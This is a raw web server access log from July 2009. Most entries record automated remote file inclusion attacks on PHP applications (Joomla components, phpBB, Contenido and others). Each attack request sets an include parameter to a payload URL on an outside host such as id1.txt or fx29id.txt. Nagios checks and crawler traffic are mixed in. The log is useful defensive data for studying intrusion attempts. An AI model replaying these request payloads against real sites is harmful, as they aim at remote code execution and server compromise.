59.22.140.17 - - [16/Jul/2009:04:10:53 -0400] "GET /index.php?lg=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
67.18.63.194 - - [16/Jul/2009:04:11:08 -0400] "GET /logs/access_log.Q109063000%20%20//faqsupport/samplefaqsupport.php?path[docroot]=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
67.18.63.194 - - [16/Jul/2009:04:11:08 -0400] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
67.18.63.194 - - [16/Jul/2009:04:11:08 -0400] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
209.59.12.99 - - [16/Jul/2009:04:11:10 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
67.18.63.194 - - [16/Jul/2009:04:12:20 -0400] "GET /logs/access_log.Q109052600%20%20//faqsupport/samplefaqsupport.php?path[docroot]=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
66.249.68.70 - - [16/Jul/2009:04:12:31 -0400] "GET /images/items/index8_nonstrlgz.jpg HTTP/1.1" 200 2904 "-" "Googlebot-Image/1.0"
76.12.17.218 - - [16/Jul/2009:04:13:31 -0400] "GET /logs/joomla/index.php?option=com_restaurante&task=http://blog.sven-downunder.de/baner.txt?? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
76.12.17.218 - - [16/Jul/2009:04:13:31 -0400] "GET /logs/access_log.Q109061400%20%20/joomla/index.php?option=com_restaurante&task=http://blog.sven-downunder.de/baner.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
76.12.17.218 - - [16/Jul/2009:04:13:31 -0400] "GET /joomla/index.php?option=com_restaurante&task=http://blog.sven-downunder.de/baner.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
76.12.17.218 - - [16/Jul/2009:04:13:36 -0400] "GET /logs/error_log.Q109061400%20%20/joomla/index.php?option=com_restaurante&task=http://blog.sven-downunder.de/baner.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
76.12.17.218 - - [16/Jul/2009:04:14:10 -0400] "GET /logs/access_log.Q109061400/joomla/index.php?option=com_restaurante&task=http://blog.sven-downunder.de/baner.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
76.12.17.218 - - [16/Jul/2009:04:14:10 -0400] "GET /logs/error_log.Q109061400/joomla/index.php?option=com_restaurante&task=http://blog.sven-downunder.de/baner.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
67.18.63.194 - - [16/Jul/2009:04:14:43 -0400] "GET /logs/joomla/index.php?option=com_restaurante&task=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
67.18.63.194 - - [16/Jul/2009:04:14:43 -0400] "GET /logs/access_log.Q109061400%20%20/joomla/index.php?option=com_restaurante&task=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
67.18.63.194 - - [16/Jul/2009:04:14:43 -0400] "GET /joomla/index.php?option=com_restaurante&task=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
78.110.50.132 - - [16/Jul/2009:04:15:12 -0400] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.trador.nl/language/id1.txt? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
78.110.50.132 - - [16/Jul/2009:04:15:12 -0400] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.trador.nl/language/id1.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
78.110.50.132 - - [16/Jul/2009:04:15:12 -0400] "GET /logs/access_log.Q109061200/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.trador.nl/language/id1.txt? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
78.110.50.132 - - [16/Jul/2009:04:15:17 -0400] "GET /logs/access_log.Q109061300/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.trador.nl/language/id1.txt? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
67.18.63.194 - - [16/Jul/2009:04:15:20 -0400] "GET /logs/access_log.Q109061400/joomla/index.php?option=com_restaurante&task=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
201.232.54.48 - - [16/Jul/2009:04:15:57 -0400] "GET //arcade.php?phpbb_root_path=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
201.232.54.48 - - [16/Jul/2009:04:15:57 -0400] "GET /logs//arcade.php?phpbb_root_path=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
201.232.54.48 - - [16/Jul/2009:04:16:02 -0400] "GET /logs/access_log.Q109051200//arcade.php?phpbb_root_path=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
209.59.12.99 - - [16/Jul/2009:04:16:10 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
201.232.54.48 - - [16/Jul/2009:04:16:40 -0400] "GET /logs/access_log.Q109071100//arcade.php?phpbb_root_path=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
78.110.50.132 - - [16/Jul/2009:04:17:34 -0400] "GET /logs/access_log.Q109061200%20%20/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.trador.nl/language/id1.txt? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
78.110.50.132 - - [16/Jul/2009:04:17:40 -0400] "GET /logs/access_log.Q109061300%20%20/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.trador.nl/language/id1.txt? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
63.147.72.145 - - [16/Jul/2009:04:18:47 -0400] "GET //include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=http://t0ys.altervista.org/id1.txt? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
63.147.72.145 - - [16/Jul/2009:04:18:47 -0400] "GET /logs//include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=http://t0ys.altervista.org/id1.txt? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
63.147.72.145 - - [16/Jul/2009:04:18:47 -0400] "GET /logs/access_log.Q109060400%20%20//include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=http://t0ys.altervista.org/id1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
63.147.72.145 - - [16/Jul/2009:04:19:01 -0400] "GET /logs/access_log.Q109053000%20%20//include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=http://t0ys.altervista.org/id1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
85.114.133.165 - - [16/Jul/2009:04:19:34 -0400] "GET /logs/error_log.Q109063000//skin/zero_vote/ask_password.php?dir=http://www.fileden.com/files/2008/10/20/2151409/1.txt? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
87.229.45.106 - - [16/Jul/2009:04:19:57 -0400] "GET /logs/access_log.Q109062400%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://thesportstime.com/bbs/fx29id.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
87.229.45.106 - - [16/Jul/2009:04:19:57 -0400] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://thesportstime.com/bbs/fx29id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
87.229.45.106 - - [16/Jul/2009:04:19:57 -0400] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://thesportstime.com/bbs/fx29id.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
87.229.45.106 - - [16/Jul/2009:04:20:22 -0400] "GET /logs/access_log.Q109061200%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://thesportstime.com/bbs/fx29id.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
209.59.12.99 - - [16/Jul/2009:04:21:11 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
110.45.138.139 - - [16/Jul/2009:04:22:25 -0400] "GET /logs/access_log.Q109051800%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://fritzcomforthomes.com/copyme.txt??? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
110.45.138.139 - - [16/Jul/2009:04:22:25 -0400] "GET /logs/access_log.Q109061600%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://fritzcomforthomes.com/copyme.txt??? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
201.232.54.48 - - [16/Jul/2009:04:25:31 -0400] "GET //skin/zero_vote/login.php?dir=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
201.232.54.48 - - [16/Jul/2009:04:25:31 -0400] "GET /logs//skin/zero_vote/login.php?dir=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
201.232.54.48 - - [16/Jul/2009:04:25:31 -0400] "GET /logs/access_log.Q109070800%20%20//skin/zero_vote/login.php?dir=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
201.232.54.48 - - [16/Jul/2009:04:25:38 -0400] "GET /logs/access_log.Q109052300%20%20//skin/zero_vote/login.php?dir=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
209.59.12.99 - - [16/Jul/2009:04:26:10 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
94.23.2.21 - - [16/Jul/2009:04:26:15 -0400] "GET /logs/errors.php?error=http://www.concept420.com//cms/tmp/fx29id.txt???? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
94.23.2.21 - - [16/Jul/2009:04:26:15 -0400] "GET /logs/access_log.Q109060400%20%20/errors.php?error=http://www.concept420.com//cms/tmp/fx29id.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
94.23.2.21 - - [16/Jul/2009:04:26:15 -0400] "GET /errors.php?error=http://www.concept420.com//cms/tmp/fx29id.txt???? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
94.23.2.21 - - [16/Jul/2009:04:26:21 -0400] "GET /logs/access_log.Q109060400%20%20/errors.php?error=http://www.concept420.com//cms/tmp/fx29id.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
94.23.2.21 - - [16/Jul/2009:04:26:21 -0400] "GET /errors.php?error=http://www.concept420.com//cms/tmp/fx29id.txt???? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
94.23.2.21 - - [16/Jul/2009:04:26:22 -0400] "GET /logs/errors.php?error=http://www.concept420.com//cms/tmp/fx29id.txt???? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
63.147.72.145 - - [16/Jul/2009:04:26:26 -0400] "GET /logs/access_log.Q109060400//include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=http://t0ys.altervista.org/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
63.147.72.145 - - [16/Jul/2009:04:26:27 -0400] "GET /logs/access_log.Q109053000//include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=http://t0ys.altervista.org/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
94.23.2.21 - - [16/Jul/2009:04:26:59 -0400] "GET /logs/access_log.Q109053000%20%20/errors.php?error=http://www.concept420.com//cms/tmp/fx29id.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
94.23.2.21 - - [16/Jul/2009:04:27:14 -0400] "GET /logs/access_log.Q109053000%20%20/errors.php?error=http://www.concept420.com//cms/tmp/fx29id.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
124.0.237.140 - - [16/Jul/2009:04:27:34 -0400] "GET /logs/errors.php?error=http://www.concept420.com//cms/tmp/fx29id.txt???? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
124.0.237.140 - - [16/Jul/2009:04:27:34 -0400] "GET /errors.php?error=http://www.concept420.com//cms/tmp/fx29id.txt???? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
124.0.237.140 - - [16/Jul/2009:04:27:34 -0400] "GET /logs/access_log.Q109060400%20%20/errors.php?error=http://www.concept420.com//cms/tmp/fx29id.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
124.0.237.140 - - [16/Jul/2009:04:27:47 -0400] "GET /errors.php?error=http://www.concept420.com//cms/tmp/fx29id.txt???? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
124.0.237.140 - - [16/Jul/2009:04:27:47 -0400] "GET /logs/access_log.Q109060400%20%20/errors.php?error=http://www.concept420.com//cms/tmp/fx29id.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
124.0.237.140 - - [16/Jul/2009:04:27:47 -0400] "GET /logs/errors.php?error=http://www.concept420.com//cms/tmp/fx29id.txt???? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
124.0.237.140 - - [16/Jul/2009:04:28:17 -0400] "GET /logs/access_log.Q109053000%20%20/errors.php?error=http://www.concept420.com//cms/tmp/fx29id.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
124.0.237.140 - - [16/Jul/2009:04:28:30 -0400] "GET /logs/access_log.Q109053000%20%20/errors.php?error=http://www.concept420.com//cms/tmp/fx29id.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
59.22.140.17 - - [16/Jul/2009:04:29:29 -0400] "GET /index.php?lg=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
59.22.140.17 - - [16/Jul/2009:04:29:29 -0400] "GET /logs/access_log.Q109051100/index.php?lg=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
59.22.140.17 - - [16/Jul/2009:04:29:29 -0400] "GET /logs/index.php?lg=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
211.230.156.161 - - [16/Jul/2009:04:30:10 -0400] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
211.230.156.161 - - [16/Jul/2009:04:30:10 -0400] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
211.230.156.161 - - [16/Jul/2009:04:30:10 -0400] "GET /logs/access_log.Q109062800//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
67.18.63.194 - - [16/Jul/2009:04:30:34 -0400] "GET /logs/access_log.Q109051700//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
67.18.63.194 - - [16/Jul/2009:04:30:34 -0400] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
67.18.63.194 - - [16/Jul/2009:04:30:34 -0400] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
76.12.17.218 - - [16/Jul/2009:04:30:36 -0400] "GET /logs/access_log.Q109051700//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
76.12.17.218 - - [16/Jul/2009:04:30:36 -0400] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
76.12.17.218 - - [16/Jul/2009:04:30:36 -0400] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
76.12.17.218 - - [16/Jul/2009:04:31:05 -0400] "GET /logs/access_log.Q109061300//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
201.232.54.48 - - [16/Jul/2009:04:31:07 -0400] "GET /logs/access_log.Q109070800//skin/zero_vote/login.php?dir=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
201.232.54.48 - - [16/Jul/2009:04:31:07 -0400] "GET /logs/access_log.Q109052300//skin/zero_vote/login.php?dir=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
209.59.12.99 - - [16/Jul/2009:04:31:16 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
76.12.17.218 - - [16/Jul/2009:04:31:22 -0400] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
76.12.17.218 - - [16/Jul/2009:04:31:22 -0400] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
76.12.17.218 - - [16/Jul/2009:04:31:22 -0400] "GET /logs/access_log.Q109051700//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
67.18.63.194 - - [16/Jul/2009:04:31:34 -0400] "GET /logs/access_log.Q109061300//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
76.12.17.218 - - [16/Jul/2009:04:32:19 -0400] "GET /logs/access_log.Q109061300//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
218.246.20.221 - - [16/Jul/2009:04:32:28 -0400] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=http://piffopuff.se/images/stories//test.txt??? HTTP/1.1" 404 213 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)"
218.246.20.221 - - [16/Jul/2009:04:32:28 -0400] "GET //index.php?name=PNphpBB2&file=viewtopic&t=http://piffopuff.se/images/stories//test.txt??? HTTP/1.1" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)"
76.12.17.218 - - [16/Jul/2009:04:33:14 -0400] "GET /logs/access_log.Q109051700%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
76.12.17.218 - - [16/Jul/2009:04:33:58 -0400] "GET /logs/access_log.Q109051700%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
76.12.17.218 - - [16/Jul/2009:04:33:59 -0400] "GET /logs/access_log.Q109061300%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
67.18.63.194 - - [16/Jul/2009:04:33:59 -0400] "GET /logs/access_log.Q109051700%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
76.12.17.218 - - [16/Jul/2009:04:34:13 -0400] "GET /logs/access_log.Q109061300%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
67.18.63.194 - - [16/Jul/2009:04:34:24 -0400] "GET /logs/access_log.Q109061300%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
220.231.126.252 - - [16/Jul/2009:04:34:40 -0400] "GET /logs/?_zb_path=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 200 9726 "-" "Mozilla/5.0"
220.231.126.252 - - [16/Jul/2009:04:34:40 -0400] "GET /?_zb_path=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
220.231.126.252 - - [16/Jul/2009:04:34:40 -0400] "GET /logs/access_log.Q109051800/?_zb_path=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
220.231.126.252 - - [16/Jul/2009:04:34:58 -0400] "GET /?_zb_path=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
220.231.126.252 - - [16/Jul/2009:04:34:58 -0400] "GET /logs/?_zb_path=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 200 9726 "-" "Mozilla/5.0"
220.231.126.252 - - [16/Jul/2009:04:34:58 -0400] "GET /logs/access_log.Q109051800/?_zb_path=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
74.223.143.131 - - [16/Jul/2009:04:35:10 -0400] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://anansi.pl/idxx.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
74.223.143.131 - - [16/Jul/2009:04:35:10 -0400] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://anansi.pl/idxx.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
74.223.143.131 - - [16/Jul/2009:04:35:10 -0400] "GET /logs/access_log.Q109051100//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://anansi.pl/idxx.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
74.223.143.131 - - [16/Jul/2009:04:35:14 -0400] "GET /logs/access_log.Q109062900//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://anansi.pl/idxx.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
74.223.143.131 - - [16/Jul/2009:04:35:58 -0400] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://anansi.pl/idxx.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
74.223.143.131 - - [16/Jul/2009:04:35:58 -0400] "GET /logs/access_log.Q109051100//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://anansi.pl/idxx.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
74.223.143.131 - - [16/Jul/2009:04:35:58 -0400] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://anansi.pl/idxx.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
74.223.143.131 - - [16/Jul/2009:04:36:03 -0400] "GET /logs/access_log.Q109062900//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://anansi.pl/idxx.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
209.59.12.99 - - [16/Jul/2009:04:36:16 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.249.68.247 - - [16/Jul/2009:04:36:19 -0400] "GET /images/items/2PC_REMOVER_FULL.JPG HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
74.223.143.131 - - [16/Jul/2009:04:37:33 -0400] "GET /logs/access_log.Q109051100%20%20//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://anansi.pl/idxx.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
74.223.143.131 - - [16/Jul/2009:04:37:36 -0400] "GET /logs/access_log.Q109062900%20%20//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://anansi.pl/idxx.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
119.152.35.250 - - [16/Jul/2009:04:38:06 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
119.152.35.250 - - [16/Jul/2009:04:38:06 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
119.152.35.250 - - [16/Jul/2009:04:38:12 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
119.152.35.250 - - [16/Jul/2009:04:38:12 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
66.249.68.70 - - [16/Jul/2009:04:38:25 -0400] "GET /images/items/index13_dentanas.jpg HTTP/1.1" 200 4818 "-" "Googlebot-Image/1.0"
119.152.35.250 - - [16/Jul/2009:04:40:19 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
119.152.35.250 - - [16/Jul/2009:04:40:19 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
209.59.12.99 - - [16/Jul/2009:04:41:16 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
65.55.108.244 - - [16/Jul/2009:04:41:16 -0400] "GET /robots.txt HTTP/1.1" 404 208 "-" "Mozilla/4.0"
65.55.108.244 - - [16/Jul/2009:04:41:17 -0400] "GET /logs/error_log.Q108122300 HTTP/1.1" 404 223 "-" "Mozilla/4.0"
65.55.108.244 - - [16/Jul/2009:04:41:21 -0400] "GET /logs/access_log.Q107081300 HTTP/1.1" 404 224 "-" "Mozilla/4.0"
211.43.202.66 - - [16/Jul/2009:04:42:26 -0400] "GET //orca/?sIncPath=http://www.bandbib.com/unix/id.txt??? HTTP/1.1" 404 204 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
211.43.202.66 - - [16/Jul/2009:04:42:26 -0400] "GET /logs//orca/?sIncPath=http://www.bandbib.com/unix/id.txt??? HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
59.24.49.35 - - [16/Jul/2009:04:42:42 -0400] "GET /administrator%5Ccomponents%5Ccom_dbquery%5Cclasses%5CDBQ%5Cadmin%5Ccommon.class.php=http://www.votemydog.com/dogs/fx29id.txt?? HTTP/1.1" 404 310 "-" "Mozilla/5.0"
59.24.49.35 - - [16/Jul/2009:04:42:42 -0400] "GET /logs/access_log.Q109060100%20%20/administrator%5Ccomponents%5Ccom_dbquery%5Cclasses%5CDBQ%5Cadmin%5Ccommon.class.php=http://www.votemydog.com/dogs/fx29id.txt?? HTTP/1.1" 404 339 "-" "Mozilla/5.0"
59.24.49.35 - - [16/Jul/2009:04:42:42 -0400] "GET /logs/administrator%5Ccomponents%5Ccom_dbquery%5Cclasses%5CDBQ%5Cadmin%5Ccommon.class.php=http://www.votemydog.com/dogs/fx29id.txt?? HTTP/1.1" 404 315 "-" "Mozilla/5.0"
59.24.49.35 - - [16/Jul/2009:04:42:50 -0400] "GET /logs/access_log.Q109052700%20%20/administrator%5Ccomponents%5Ccom_dbquery%5Cclasses%5CDBQ%5Cadmin%5Ccommon.class.php=http://www.votemydog.com/dogs/fx29id.txt?? HTTP/1.1" 404 339 "-" "Mozilla/5.0"
